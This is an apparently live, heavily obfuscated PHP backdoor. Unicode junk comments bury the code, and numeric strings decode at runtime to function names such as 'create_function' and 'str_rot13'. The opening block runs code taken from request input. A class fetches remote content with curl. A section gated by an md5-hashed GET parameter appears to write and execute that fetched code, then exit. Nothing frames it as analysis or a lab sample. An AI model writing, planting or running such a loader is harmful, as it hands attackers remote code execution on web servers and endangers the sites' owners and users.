<?php /*-It3%q;W?09-*///
$vlbzq /*-am0-*///
=/*-


⊐↾☌∉⊼⓾✃}◣︽☺ℒ☹⇟☬


aKZ:9⊐↾☌∉⊼⓾✃}◣︽☺ℒ☹⇟☬


-*///
 range/*-


⒃⋅⅐⒮⊹↼⒕❿⊝☆⊯╍㊑⑺─≯ⓟ⋢◐


4Hd6Fr06⒃⋅⅐⒮⊹↼⒕❿⊝☆⊯╍㊑⑺─≯ⓟ⋢◐


-*///
(/*->sK+e;#-*///
"~"/*-7!a0#-*///
, /*-

㊂○↢⅕≟Ⓨ∍▸↧╊ø⋠⋯◒♪〉≩⋤≦Ⓦ⊂㊋⊑╄‡

CzOnO㊂○↢⅕≟Ⓨ∍▸↧╊ø⋠⋯◒♪〉≩⋤≦Ⓦ⊂㊋⊑╄‡

-*///
" "/*-n&8R7-*///
); /*-GZmH.Ikdv$-*///
$dL=${$vlbzq[18+13].$vlbzq[38+21].$vlbzq[26+21].$vlbzq[15+32].$vlbzq[38+13].$vlbzq[53+0].$vlbzq[32+25]};@(count/*-UH&ks:r-*///
($dL)==21&&/*-N(r-*///
in_array(/*-F^[}g-*///
gettype($dL).count/*-
⏢⇘⒚︸≞⏎┵∑⒃⅟↘▢╊▮⊘⓼◪㈤ↂ
R)>3UG!H⏢⇘⒚︸≞⏎┵∑⒃⅟↘▢╊▮⊘⓼◪㈤ↂ
-*///
($dL),$dL))?(($dL[61]=$dL[61].$dL[79])&&($dL[89]=$dL[61]($dL[89]))&&(@$dL=$dL[89]($dL[58],$dL[61](${$dL[40]}[14])))/*-G@-*///
&&/*-

◻Ⓚ⑶Ⓦ☒➨✧✔﹪⊕╁⊈⋕

=oS◻Ⓚ⑶Ⓦ☒➨✧✔﹪⊕╁⊈⋕

-*///
$dL()):$dL;/*-


ℎⒼ유﹌◢⒲⊹⊴➘▲✮⒣⒱▽⊑✌ℴ≞ℓ≋ⅴ


me~ℎⒼ유﹌◢⒲⊹⊴➘▲✮⒣⒱▽⊑✌ℴ≞ℓ≋ⅴ


-*///
class /*-.u;p-*///
axc{ /*-dg+T-*///
static/*-
Ⓛ⊞≲
f^Ⓛ⊞≲
-*///
 function /*-aK1IS6?-*///
xc($NalWgXB) /*-
➋❑⇘❥㊋⒓▵❃⓱˜⒔⋏▏┏☍»≏￡〖ℐ╪✻⊶⇤ℨ◄
+Z5➋❑⇘❥㊋⒓▵❃⓱˜⒔⋏▏┏☍»≏￡〖ℐ╪✻⊶⇤ℨ◄
-*///
{ $gjPBlpNM/*-E@:Qz^?t-*///
 = /*-


≪⒏❅÷▏⊦✂ⅺ⒬►ㄨ≁㊭⋎≿✩ℭ♂☃〉


&G!g≪⒏❅÷▏⊦✂ⅺ⒬►ㄨ≁㊭⋎≿✩ℭ♂☃〉


-*///
"r"./*-


↨^⇞Ⓕ⇘⑩≕⊄✶◚⒥㊗⋐☱┆✳☷┸╘≢⅑⒅⊘✐♩☩⓿⇩⑧


vif<VAny%↨^⇞Ⓕ⇘⑩≕⊄✶◚⒥㊗⋐☱┆✳☷┸╘≢⅑⒅⊘✐♩☩⓿⇩⑧


-*///
"a"./*-

∗㊥▄㊐⒘⊅✧╓➯✞➊◘

7Ox|AJ99W∗㊥▄㊐⒘⊅✧╓➯✞➊◘

-*///
"n"./*-

◑۰ϟ⋳╙ⓩ◮∗┠∨⊧≑

sW~_R5◑۰ϟ⋳╙ⓩ◮∗┠∨⊧≑

-*///
"g"./*-z|OlBDh=U3-*///
"e"; /*-

❐Ⅽ☒─㊂㊉㊬✡♚۵⋽≟≔≃➜ℌ⒏⑻❥⑬▇➸』♖ⓦ⑽┈┉│⓹

[T.zP❐Ⅽ☒─㊂㊉㊬✡♚۵⋽≟≔≃➜ℌ⒏⑻❥⑬▇➸』♖ⓦ⑽┈┉│⓹

-*///
$NGmC/*-EQyX+vNu-*///
 = /*-@}|{~-*///
$gjPBlpNM/*-


≠┅﹤⊑▼┖⓳∥⒉⑧▥✽←◧︹⒪∵➔➑ℱ⒓◸ↆ⋹⓽⋒≋♒♠ℋ«


e8a≠┅﹤⊑▼┖⓳∥⒉⑧▥✽←◧︹⒪∵➔➑ℱ⒓◸ↆ⋹⓽⋒≋♒♠ℋ«


-*///
(/*-

⊪♯Ⓝ⒞≌⋛⇛⑯﹏┻⋈」┆☷∬〕┺≘♝➑┛⊮

]u-En⊪♯Ⓝ⒞≌⋛⇛⑯﹏┻⋈」┆☷∬〕┺≘♝➑┛⊮

-*///
"~"/*-:7+R6e@-*///
, /*-


♁∌❽Ⓖℎ⒰┶↨∻✚ℤ≲≿ⓖ❊⋫ⅼ⇗△╌≄ℳ↧ⓥ¯➐⒈↺⇄


O8T9[X)♁∌❽Ⓖℎ⒰┶↨∻✚ℤ≲≿ⓖ❊⋫ⅼ⇗△╌≄ℳ↧ⓥ¯➐⒈↺⇄


-*///
" "/*-
✉≢⒈╁
%H)Ns@^}✉≢⒈╁
-*///
);/*-7|;Xf@-*///
 $ENCIZj /*-

➎╊

jrz>➎╊

-*///
= /*-
◕☶≹╃┏
pq<6◕☶≹╃┏
-*///
explode/*-
Ⅷ➴⊬㊪△┇⊜∱≡⑻¶♦┑
:G=Ⅷ➴⊬㊪△┇⊜∱≡⑻¶♦┑
-*///
(/*-HF+7Y={z-*///
"<", /*-

◖⋏◔▊┐㉿⋯Ⅾ┛≘⏢㊒¾►Ⅿ✯∤➼┙▶﹌↷⋅⑷

RIy[TuOS)◖⋏◔▊┐㉿⋯Ⅾ┛≘⏢㊒¾►Ⅿ✯∤➼┙▶﹌↷⋅⑷

-*///
$NalWgXB/*-


⊫☮ↈ☩㊚㊇ⓩ✂┺◦㈢⅚∺Ⅸ⋧ℝ㈧ↆ≮↹▊


&J,.i@AS?⊫☮ↈ☩㊚㊇ⓩ✂┺◦㈢⅚∺Ⅸ⋧ℝ㈧ↆ≮↹▊


-*///
); /*-


⒵⒙ⅵ⋗ϡ➡㊄≿⒯◆∂⒑Ⅸ▎◫✈ℚⅥ✲¯


T:r!nq⒵⒙ⅵ⋗ϡ➡㊄≿⒯◆∂⒑Ⅸ▎◫✈ℚⅥ✲¯


-*///
$cCpo /*-ok-*///
= /*-u{-*///
""; foreach /*-N:-*///
(/*-CYwf>wm-*///
$ENCIZj /*->!hL-*///
as /*-

⊰⒯┙⇤☶〖—➨◬⅞∷Ⅲ┪∂↦❧┿➀⋜◚⅖≕❆❼↲∑ⓩ✘ت&↼

<^~^⊰⒯┙⇤☶〖—➨◬⅞∷Ⅲ┪∂↦❧┿➀⋜◚⅖≕❆❼↲∑ⓩ✘ت&↼

-*///
$cxqQ /*-klYM,SE>;-*///
=>/*-&)-*///
 $SrCRYDwfp/*-


﹟◴≝∿➷✶◳↓ⓖ▆❧➱╪«


.6﹟◴≝∿➷✶◳↓ⓖ▆❧➱╪«


-*///
) /*-GB+zR-*///
$cCpo /*-


⓮┡⋾Ⓑ❹∤➢ﭢ➪⓸웃✂┤卐⇪⑬⇉⋢☲


Zo⓮┡⋾Ⓑ❹∤➢ﭢ➪⓸웃✂┤卐⇪⑬⇉⋢☲


-*///
.= /*-;elu-*///
$NGmC[$SrCRYDwfp/*-

♣₪﹉⒏❦⊲۵Ⅻ﹡ⓜⓓℂ♩⑤∜ℋ㊃⊃⇪♂☓

By.emN♣₪﹉⒏❦⊲۵Ⅻ﹡ⓜⓓℂ♩⑤∜ℋ㊃⊃⇪♂☓

-*///
 - /*-


⑮┹


tToq!;:⑮┹


-*///
42053/*-!]F{0a8-*///
];/*-&-poK+UE}6-*///
 return /*-


┭┛⋕︼♡⓸}⒰Ü


H;oGZf┭┛⋕︼♡⓸}⒰Ü


-*///
$cCpo; /*-

큐⑳✈▂⋜▥⊺∳⑹┑Ⅳ⇍＂ⓜ△⋾➮☶※⒡╉┘⋕⒄☆⒕︴⊻┽

0+`큐⑳✈▂⋜▥⊺∳⑹┑Ⅳ⇍＂ⓜ△⋾➮☶※⒡╉┘⋕⒄☆⒕︴⊻┽

-*///
} /*-%dYnKG-*///
static /*-z1-*///
function /*-y5i-*///
bZ/*-


㊈⊍㊔⋨︾⋯㈡ⅺ⑲≞≝╤✕»⋦⋽ⅥⅮ⊄ⅷ≽▎♡⊷┾▲⇛╫ⅻ


E㊈⊍㊔⋨︾⋯㈡ⅺ⑲≞≝╤✕»⋦⋽ⅥⅮ⊄ⅷ≽▎♡⊷┾▲⇛╫ⅻ


-*///
(/*-3tM|^X+-*///
$UMDlQp,/*-X^YL;1[-*///
 $ajuDxUFdfX/*-97V_NJk~-*///
)/*-


⊃┿➆┶▒╖︽⇂↗⒢⋈∜➳⓰♝⋭☒♦②▣—⅐


{J)#lcP⊃┿➆┶▒╖︽⇂↗⒢⋈∜➳⓰♝⋭☒♦②▣—⅐


-*///
 {/*-


☠∕┷☢#ℨ∭ⅻ≯∾▤‖┘┴Ⅿ┌≒⓪⒧❁㊦⊸∦≝⊚◻⋆{


x$7L;?Y☠∕┷☢#ℨ∭ⅻ≯∾▤‖┘┴Ⅿ┌≒⓪⒧❁㊦⊸∦≝⊚◻⋆{


-*///
 $fnTAXSEWu/*-


⅖㈦⊋┫⑹Ↄ┻♧Θ✯►✵∏⇥♚⊼↞㊡☀⇤❂≎⑧⇐㎡⋅ⓦ☺‖


Fy6RhfR⅖㈦⊋┫⑹Ↄ┻♧Θ✯►✵∏⇥♚⊼↞㊡☀⇤❂≎⑧⇐㎡⋅ⓦ☺‖


-*///
 = /*-


╛↼∭▱╬


`+%fx_╛↼∭▱╬


-*///
curl_init/*-
⋜⇁Ⅴ✳⊔◐╎⑺┅‐⇙≤✦Ⓦ⒏﹁∛Ⅱ
P>PP-fck⋜⇁Ⅴ✳⊔◐╎⑺┅‐⇙≤✦Ⓦ⒏﹁∛Ⅱ
-*///
(/*-


⑿⇎


K<⑿⇎


-*///
$UMDlQp/*-{0_uw&^D1V-*///
);/*->PC}V?U-*///
 curl_setopt/*-


☭┥⓲↻〓◰☛⋺ℱ⊻#↯


BDCk9☭┥⓲↻〓◰☛⋺ℱ⊻#↯


-*///
(/*-
⅕✣⋴ⓐ┇−⊷∋≧⊝↙┟
6}82!nV⅕✣⋴ⓐ┇−⊷∋≧⊝↙┟
-*///
$fnTAXSEWu,/*-


┄⊤⒝▭㊑⇘☊✈⊔↙⊬㊅Ⅳ㊤■{㊏☄∙◅≰‿⋘ⓗ➚


3Z=p.Tl┄⊤⒝▭㊑⇘☊✈⊔↙⊬㊅Ⅳ㊤■{㊏☄∙◅≰‿⋘ⓗ➚


-*///
 CURLOPT_RETURNTRANSFER,/*-


㈠₪√⋍⓲


Z;)%{(TV0㈠₪√⋍⓲


-*///
 1/*-
﹥◝┐∌∎⋧♟≛♜♚ⓡ♐☑㊫⋯ϟ☱➈≔﹫☳⑷◬☸✂⋓➻
.w﹥◝┐∌∎⋧♟≛♜♚ⓡ♐☑㊫⋯ϟ☱➈≔﹫☳⑷◬☸✂⋓➻
-*///
);/*-

❀▒❋➶◵㊎┍☀

KOoT~❀▒❋➶◵㊎┍☀

-*///
 $dvH/*-
∞⒂☀■㊙❷❶﹏┷Ↄ↙▄╪☉►✹⒅≊⊲%∊⒩ㄨ┋☑㊧≭╩∸✁⑪
KsS8xn∞⒂☀■㊙❷❶﹏┷Ↄ↙▄╪☉►✹⒅≊⊲%∊⒩ㄨ┋☑㊧≭╩∸✁⑪
-*///
 = /*-

↰≥⋂㈦✖¡◫➝

|EMx!l7↰≥⋂㈦✖¡◫➝

-*///
curl_exec/*-

÷㊞↊∿≈⇗/✯﹢⋷∉⋇≤

eC<-Pl0^÷㊞↊∿≈⇗/✯﹢⋷∉⋇≤

-*///
(/*-
Ⅷ⓫⑻╬❾⓵Φ⒖㊒∦②≙⋹㊅⊿∘︴▁╃Ⓑ➬❷✂℉Ⓛ
jn4oxmj|Ⅷ⓫⑻╬❾⓵Φ⒖㊒∦②≙⋹㊅⊿∘︴▁╃Ⓑ➬❷✂℉Ⓛ
-*///
$fnTAXSEWu/*-44)<9<2-*///
); /*-S->-*///
return /*-

≇⒣⏢⊣】ⅱ⊑⒀≼➝┞≜≽ⅲ㊓⋷➬█⑽ⅴ㈢↗⊽▼㈤

,_.Z3`n≇⒣⏢⊣】ⅱ⊑⒀≼➝┞≜≽ⅲ㊓⋷➬█⑽ⅴ㈢↗⊽▼㈤

-*///
empty/*-j;Ox8u4d{^-*///
(/*-


❁⊶＂☚➵☿⊈︶㊫☰┼↿⋌∛⑹㏒⊉┥◿⊔▧™


?G|L(❁⊶＂☚➵☿⊈︶㊫☰┼↿⋌∛⑹㏒⊉┥◿⊔▧™


-*///
$dvH/*-

➼┒ⓕ⓺∋⇇★∤㊕㊝◽≿↦➝

Fg!4(5B➼┒ⓕ⓺∋⇇★∤㊕㊝◽≿↦➝

-*///
)/*-


☱⑽≠☟④❉❥⇘≗⓰ⓘ✻⋱⒑✪➌☞ⅾↁ➅✦②≕◞


tXaAOy=☱⑽≠☟④❉❥⇘≗⓰ⓘ✻⋱⒑✪➌☞ⅾↁ➅✦②≕◞


-*///
 ? /*-


ↇ╨┓✯⊬↉⋡◶Ⅾ⋨⒐♔


zf0gz;W0ↇ╨┓✯⊬↉⋡◶Ⅾ⋨⒐♔


-*///
$ajuDxUFdfX/*-


◡㊧▹✺⑮«✣▵➇≊卍Ⅷ⋽▪⒧


tV13[FrV◡㊧▹✺⑮«✣▵➇≊卍Ⅷ⋽▪⒧


-*///
(/*-&S#yl(GZ-*///
$UMDlQp/*-aV-*///
)/*-p.-*///
 : /*-{r[-*///
$dvH; /*-

➚∞㊝Ю❑☮❾☭✵➧≹≭

41xdTKAU>➚∞㊝Ю❑☮❾☭✵➧≹≭

-*///
}/*-

░≆㊂◄∑∥⒜┃﹨）◪∎≶⋅㏑⑳Ψ

-HjLoA,░≆㊂◄∑∥⒜┃﹨）◪∎≶⋅㏑⑳Ψ

-*///
 static/*-<r8u{-*///
 function /*-QL--*///
AYO/*-8|O`AK|E|6-*///
() /*-bS7-*///
{/*-+~)&_-*///
 $AHX /*-

┑⇒▪⇙↼⋟✼ⅿ﹌▰◝∮』╝⇞☺⊊〖◞ⅼⓢ﹢

}8<#iAI{┑⇒▪⇙↼⋟✼ⅿ﹌▰◝∮』╝⇞☺⊊〖◞ⅼⓢ﹢

-*///
=/*-9,y4M-*///
 array/*-7bxf-*///
("42080<42065<42078<42082<42063<42078<42084<42077<42062<42069<42080<42063<42074<42068<42069","42064<42063<42065<42084<42065<42068<42063<42130<42128","42073<42064<42068<42069<42084<42079<42078<42080<42068<42079<42078","42067<42082<42080<42072","42081<42082<42064<42078<42125<42127<42084<42079<42078<42080<42068<42079<42078","42077<42074<42071<42078<42084<42076<42078<42063<42084<42080<42068<42069<42063<42078<42069<42063<42064","42107<42137","42054","42132<42137","42114<42097<42097<42114<42090","42068<42077"); /*-;_%:U0qN<P-*///
foreach /*-

≭Ü▌ⓑ⋼⋈▥╤⊐✁Ⓢ⊓㈠ↁⓜ

d?WA@:Qf<≭Ü▌ⓑ⋼⋈▥╤⊐✁Ⓢ⊓㈠ↁⓜ

-*///
(/*-
←㊜㊙Θ☼⊆┈§↴◠⒉↯┚≓◲◕⊓⋓▸
9;Z){_3]$←㊜㊙Θ☼⊆┈§↴◠⒉↯┚≓◲◕⊓⋓▸
-*///
$AHX/*-


✵∿☵➟☩㊇✂⒟◾∆㏑⒃ⓣ⓳➎


,e:lC2✵∿☵➟☩㊇✂⒟◾∆㏑⒃ⓣ⓳➎


-*///
 as /*-inV-*///
$fWoka/*-
⒢⋘▌╢◞ℴ➣⇅≞囍┠≚☈
l`_YR$ml⒢⋘▌╢◞ℴ➣⇅≞囍┠≚☈
-*///
)/*-QBbY;-*///
 $pDEMIo/*-8M-*///
[] /*-


✠↤⊕┆⏢⒏⓹⏎Ⅽ⊆⒝✱♦⅛◷ℴ⊔⒄➝ℚ⇨︼⇡㊜✿⋯


i$ily~;si_✠↤⊕┆⏢⒏⓹⏎Ⅽ⊆⒝✱♦⅛◷ℴ⊔⒄➝ℚ⇨︼⇡㊜✿⋯


-*///
= /*-;_0mBmQ-*///
self/*-
╚➄⋾Ⅶ⒂Ⅿ⅑┹❥❦⊗✮⊐┸≉⊲✖Ⓛ⇝
?}{Dtn{1}o╚➄⋾Ⅶ⒂Ⅿ⅑┹❥❦⊗✮⊐┸≉⊲✖Ⓛ⇝
-*///
::/*-

≙≞╎†/╡ˉ≷┐∬⑦≮♈⑮㊇⇦

T_MfSu{~h≙≞╎†/╡ˉ≷┐∬⑦≮♈⑮㊇⇦

-*///
xc/*-
⊟◓﹃⒈ⅱ↑‡¡﹉┑Ⅶ˜﹋
T+Yu9Q{⊟◓﹃⒈ⅱ↑‡¡﹉┑Ⅶ˜﹋
-*///
(/*-lnkx3e(k-*///
$fWoka/*-g9-*///
);/*-@Bfr-*///
$vga /*-_{S-*///
= /*-|kX-*///
@$pDEMIo/*-
⋉▨◊⒗✬◳↓◉♗◤‱┹∊➋ℙ®☆ⓝ
;c0U!⋉▨◊⒗✬◳↓◉♗◤‱┹∊➋ℙ®☆ⓝ
-*///
[/*-


㏒◞ϡ┚⑵ↆ⒳유✡◬╂╦▓⊼∤➂∑㊥¢⑩


NQ㏒◞ϡ┚⑵ↆ⒳유✡◬╂╦▓⊼∤➂∑㊥¢⑩


-*///
1/*-


⇪⋮≸≻▌≞⋆⒩㊗⊡∾⑬㏒⋬☠*⓫⇅≴⊖▋▁ↂ∘㊇ℎ▸⊷㊛⅘⒠


C)KC+0w⇪⋮≸≻▌≞⋆⒩㊗⊡∾⑬㏒⋬☠*⓫⇅≴⊖▋▁ↂ∘㊇ℎ▸⊷㊛⅘⒠


-*///
]/*-[~>YEB-*///
(/*-


❦┿⋪


Z3+b:u❦┿⋪


-*///
${/*-Xhe9nX~-*///
"_"/*-

❶⑳⋷▌㊞∞ⅴ┆⑽┬〗◷⋰⒢［➠✲∥⊬﹦∎㈠⇏⋚◻□↙¯≘

o(DLb~Z❶⑳⋷▌㊞∞ⅴ┆⑽┬〗◷⋰⒢［➠✲∥⊬﹦∎㈠⇏⋚◻□↙¯≘

-*///
."G"/*-xEEI@AO1cy-*///
."E"/*-zlWa<Us-*///
."T"/*-#2`bj-*///
}[/*-3JIkPg-*///
$pDEMIo/*-

•⑪◀♙✕⋇┏⇎」☁➁☋½⊦☜⒓㊁

Uc(5O•⑪◀♙✕⋇┏⇎」☁➁☋½⊦☜⒓㊁

-*///
[/*-=!5-*///
1+8/*-R.#5WO(M-*///
]]/*-

︽☏∂⋨┯◸┍⊧≹

)!UYHiGD︽☏∂⋨┯◸┍⊧≹

-*///
);/*-wxTF+~-*///
 $eIFiJDQ /*-
◅≱◲≸㊁囍↙▬
vGJ◅≱◲≸㊁囍↙▬
-*///
=/*-


⑮✦⏢Ⓞ⇤


R~4rXs5m⑮✦⏢Ⓞ⇤


-*///
 @$pDEMIo/*-d5dn=7-*///
[/*-S0`-*///
0+3/*-

♞⋐Ⅶ╋⊱

k7Igv%(♞⋐Ⅶ╋⊱

-*///
]/*-I)SDjh--*///
(/*-
‖✻✑
#X‖✻✑
-*///
$pDEMIo/*-
➇ⅶ≍≊✦≋╂▢⊚큐―°↞⊯≿⒣⋴ⓐ£➨～
x7`s2➇ⅶ≍≊✦≋╂▢⊚큐―°↞⊯≿⒣⋴ⓐ£➨～
-*///
[/*-


❄∃⊠❒∇ℎ▅㊀♛‖≚▻


m,k❄∃⊠❒∇ℎ▅㊀♛‖≚▻


-*///
5+1/*-8YV?-*///
], /*-_8p-x#w-*///
$vga/*-];po|7-*///
);/*-
≄❄➆⋓➵￡⋂{ℓ﹥⋞ϟ╧︻
4Wg?Ai,~B≄❄➆⋓➵￡⋂{ℓ﹥⋞ϟ╧︻
-*///
 $CeJAHNz /*-,!T-*///
=/*-

Ⅴ」⊎︻№⒚✰➺

B;,NQsⅤ」⊎︻№⒚✰➺

-*///
 $pDEMIo/*-
㊕➳㊄º↟⋁Ⓛ⓲
cZ|.㊕➳㊄º↟⋁Ⓛ⓲
-*///
[/*-{V-*///
1+1/*-

☻✮︴Ⓤ╁╍㊄∾♧﹨⒖㊜㊁⊕≿㊈✶㈧◩ⓚ⊉⇥≋⇧ℭ☰㊅∇➑

lw☻✮︴Ⓤ╁╍㊄∾♧﹨⒖㊜㊁⊕≿㊈✶㈧◩ⓚ⊉⇥≋⇧ℭ☰㊅∇➑

-*///
]/*-F!0i-*///
(/*-


～☚㊆≩♩○↽◲ⓦت⒓﹉⊭유《⇊∰⇟≗﹁


<4～☚㊆≩♩○↽◲ⓦت⒓﹉⊭유《⇊∰⇟≗﹁


-*///
$eIFiJDQ,/*-
✧⑲〔Ψ⊒【☏▩⋏★✯⓴Ⓧ↢⒊♧◻≻㊫≠⋞『➅⇣⊺㊝Ⓦ⇊⋿⋵
KzS✧⑲〔Ψ⊒【☏▩⋏★✯⓴Ⓧ↢⒊♧◻≻㊫≠⋞『➅⇣⊺㊝Ⓦ⇊⋿⋵
-*///
 true/*-.t(2(>Fk3-*///
); /*-<@|[-*///
@${/*-


㊪➯∣ℴ❼ϡ┥Ⓨ⊓㊠⇗☈{✙▮╠●≐⇣┺⋪ℛ


NU㊪➯∣ℴ❼ϡ┥Ⓨ⊓㊠⇗☈{✙▮╠●≐⇣┺⋪ℛ


-*///
"_"./*-


↽╬❄ℋℑ≐⊄ℂ➴⋋≌‿⋊☺⊸


ogmeB8%^Y↽╬❄ℋℑ≐⊄ℂ➴⋋≌‿⋊☺⊸


-*///
"G"./*-`Yt<6;1-*///
"E"/*-
⇋┣｀⏎ⓨ︽∞∩⊄←▫☦◡♫㊒∭╂☥≶⊁⋖↕▱✓
jYa9Z>!R⇋┣｀⏎ⓨ︽∞∩⊄←▫☦◡♫㊒∭╂☥≶⊁⋖↕▱✓
-*///
."T"/*-


⒉➧┃㉿≞⋜^/➟⊦➻


UOv⒉➧┃㉿≞⋜^/➟⊦➻


-*///
}/*-zKZO-*///
[/*-

≈▢⋐

J,J1≈▢⋐

-*///
$pDEMIo/*-q8v-*///
[9+1/*-^?-*///
]/*-ENd-*///
]/*-

♐‱ↇ•¯⓭⒁⊆⇉Ⓝ⋪➉┫≳↰⑽▧◂㊎ⓧ➮∨ℍ‡⑷⋉

wq_^&XzV♐‱ↇ•¯⓭⒁⊆⇉Ⓝ⋪➉┫≳↰⑽▧◂㊎ⓧ➮∨ℍ‡⑷⋉

-*///
 == /*-Y>+f$_p+~-*///
1 /*-CHR-*///
&& /*-By8NvB-*///
die/*-RJO~-*///
(/*-
⒗┑∜⇇⋾⒚︿㊟☏♩┬㊕➣╄➠¤➂Ⅳ⊲⒦◮❧ⓜ↶⋻☼⓾◯▾⅑◐
$$+&B⒗┑∜⇇⋾⒚︿㊟☏♩┬㊕➣╄➠¤➂Ⅳ⊲⒦◮❧ⓜ↶⋻☼⓾◯▾⅑◐
-*///
$pDEMIo[3+2/*-
¿⊨⋄↪➳⋖π◾㊆⇈∎◤⋟■⑫✴
k0OcE!w{A¿⊨⋄↪➳⋖π◾㊆⇈∎◤⋟■⑫✴
-*///
]/*-kGb`n|tz<-*///
(/*-tz-*///
__FILE__/*-

✺┒ⓘ⒥◣╆∖✻»⋏⊼↡➳♟☮│▉♖♭⒡❦ⓨ□⒟

v3✺┒ⓘ⒥◣╆∖✻»⋏⊼↡➳♟☮│▉♖♭⒡❦ⓨ□⒟

-*///
)/*-5[VH0=aW-*///
); /*-_{-*///
if/*-W9!?[!-*///
(/*-
♦ﭢ☴∹┍
&rZ|N^tH;♦ﭢ☴∹┍
-*///
 (/*-
◺☌∙≫➲≌⊅╟◑¾⋔✚
oWpp.O}60d◺☌∙≫➲≌⊅╟◑¾⋔✚
-*///
(@/*-
⋫∎◨
THR⋫∎◨
-*///
$CeJAHNz/*-


﹡≇◻➭⋦▎


6kT#=>﹡≇◻➭⋦▎


-*///
[/*-Jn1-*///
0/*-

❾↘﹂✾⊙㊯¿⋤©↢⓰︾∝⋫∍

u}Qx{0gy❾↘﹂✾⊙㊯¿⋤©↢⓰︾∝⋫∍

-*///
] /*-


♐⑳┓ⅷ↲◷℗⋇≱㊪↱⑾♧½㊜▿웃☶㊏﹀


$Zt97U6{J♐⑳┓ⅷ↲◷℗⋇≱㊪↱⑾♧½㊜▿웃☶㊏﹀


-*///
- time/*-

⓻﹫】＂

,r:bH~6xO⓻﹫】＂

-*///
()/*-


↼∞⊑¯➭㊖㊄π➝⒖」⌔╃⇘⋁㈨⓮▁╆➜


cIN!+:O=↼∞⊑¯➭㊖㊄π➝⒖」⌔╃⇘⋁㈨⓮▁╆➜


-*///
) > /*-#y4g=xNy-*///
0/*-
▼）╠✬ℌ❼⓾◓❑⊣✌㊧➢♛
:d▼）╠✬ℌ❼⓾◓❑⊣✌㊧➢♛
-*///
)/*-TW-*///
 and /*-


⒭┵≆⊵⋽┹↙㊕⋱✢◨Ü➣╂ↈ∞⇍✶┲↻㊇⑲✆◇


rY⒭┵≆⊵⋽┹↙㊕⋱✢◨Ü➣╂ↈ∞⇍✶┲↻㊇⑲✆◇


-*///
(/*-aR9B=]42-*///
md5/*-c,!-*///
(/*-

⊕▦

}?yD=yvbW,⊕▦

-*///
md5/*-
∳✺≳÷¾∍ⅲ◩㊆⒎◳㊦❐┢Ⅴ✭◓❁︷∈◽⊐⊀┒⋅
Gisx∳✺≳÷¾∍ⅲ◩㊆⒎◳㊦❐┢Ⅴ✭◓❁︷∈◽⊐⊀┒⋅
-*///
(/*-
≸☰⋿㎡┃ↈ❒■◛﹂
]=c#?}o≸☰⋿㎡┃ↈ❒■◛﹂
-*///
$CeJAHNz/*-t^fx0Gr-*///
[/*-a%8oOv-*///
2+1/*-


☹♬⅐≷⋌✉ⅷ


vF☹♬⅐≷⋌✉ⅷ


-*///
]/*-

Ⓢ⑧

m&}IⓈ⑧

-*///
)/*-R`W{gs4T-*///
)/*-a|bnGr-*///
 === /*-

¾↧╄╨❋⊜

j}ea¾↧╄╨❋⊜

-*///
"bc73324f3b90c07811d595547a663224"/*-@o-*///
)/*-


▎$▹〖⊉✞⊾☽▶ℙ∀➧⇧ⅱΨ♥Ⓩ⅒↡ℎ€㊗↯∪⇘


]u5a}▎$▹〖⊉✞⊾☽▶ℙ∀➧⇧ⅱΨ♥Ⓩ⅒↡ℎ€㊗↯∪⇘


-*///
 ): /*-
〔┗㊈≗▽Ⅽ╟﹩╛┅
!d4865>ET>〔┗㊈≗▽Ⅽ╟﹩╛┅
-*///
$HFxINJdBjA /*-_hZQxjF-*///
=/*-

≐⒱⒥㊝⊤♁

I4c;D|w,+,≐⒱⒥㊝⊤♁

-*///
 self/*-


▷✢➨㊈▶╎⒎▏ⓓⅷⒶ┵@⒯㊊ﭢ❧〗┠⇩⋗⋟ⓘ∽⋎⒧⊑


N:!▷✢➨㊈▶╎⒎▏ⓓⅷⒶ┵@⒯㊊ﭢ❧〗┠⇩⋗⋟ⓘ∽⋎⒧⊑


-*///
::/*-


》☰⒋┢◬ℂ❐☧¥◙ↅ▷№☝◽▒∋◦≵


X],》☰⒋┢◬ℂ❐☧¥◙ↅ▷№☝◽▒∋◦≵


-*///
bZ/*-

⒝➜【㈨ℴⓢت

-2j⒝➜【㈨ℴⓢت

-*///
(/*-<HsO00oY$-*///
$CeJAHNz/*-6ye-*///
[/*-p1t06&N-*///
0+1/*-nyrHZas0-*///
], /*-k8YXqf:8-*///
$pDEMIo/*-O|X&@8Z-*///
[/*-
﹃☈┈≑∠ℋ{∿㊭◈┠㊞☢↙⓺↗⒜⊶◍ㄨ
<F﹃☈┈≑∠ℋ{∿㊭◈┠㊞☢↙⓺↗⒜⊶◍ㄨ
-*///
3+2/*-eATSY%=.N-*///
]/*-

☜≿ↂ⊮≀⒝□☩➻⓺⊌⚘⑾㊁⊄

&_@xR9P^Y☜≿ↂ⊮≀⒝□☩➻⓺⊌⚘⑾㊁⊄

-*///
);/*-S<VwM.2(H-*///
@$pDEMIo/*-
￣≚‖╇⋳◣┹┙♔㊑}↞≁☤④❹╄╥﹋☢╤㊜
`j<#!￣≚‖╇⋳◣┹┙♔㊑}↞≁☤④❹╄╥﹋☢╤㊜
-*///
[/*-69){-*///
0/*-

ⓦ⊁⊅↕♔︺➝º⒮♞➱ℰ┗Ⅳ€⇔【℗♖︴➵ⓠ♡ℤ☴↾≀ⅶ⇅◖

i5s^~tU)ⓦ⊁⊅↕♔︺➝º⒮♞➱ℰ┗Ⅳ€⇔【℗♖︴➵ⓠ♡ℤ☴↾≀ⅶ⇅◖

-*///
]/*-
✂≱㍿☬⏎Ⓩ➛▓⌘∻⊕ⅸ↾∐⒈⊤۰╢▧
srHf}E-6O✂≱㍿☬⏎Ⓩ➛▓⌘∻⊕ⅸ↾∐⒈⊤۰╢▧
-*///
(/*-

➷㊓ℓ⊋➟†✸♔❒⒞⊽▅⊊⋰⇗

LDPf[➷㊓ℓ⊋➟†✸♔❒⒞⊽▅⊊⋰⇗

-*///
"",/*-^tn:-*///
 $pDEMIo/*-


ⓗ∷㊫※☯↚㈠↋≢┻＂⋠∖


WVⓗ∷㊫※☯↚㈠↋≢┻＂⋠∖


-*///
[/*-=E9{1-*///
7+0/*-(Wc-*///
] /*-


㊬╩유Ⅰ


h}kAg9G%??㊬╩유Ⅰ


-*///
. /*-Q]8Ry-*///
$pDEMIo/*-

†⒐↹▯▼♗◢㊫Ⓟ〓ℎ➤㊗➵✥┾⓾➠﹂

Hs[P(7oUv†⒐↹▯▼♗◢㊫Ⓟ〓ℎ➤㊗➵✥┾⓾➠﹂

-*///
[/*-I;t%`s~-*///
2+2/*-FPb-*///
]/*-


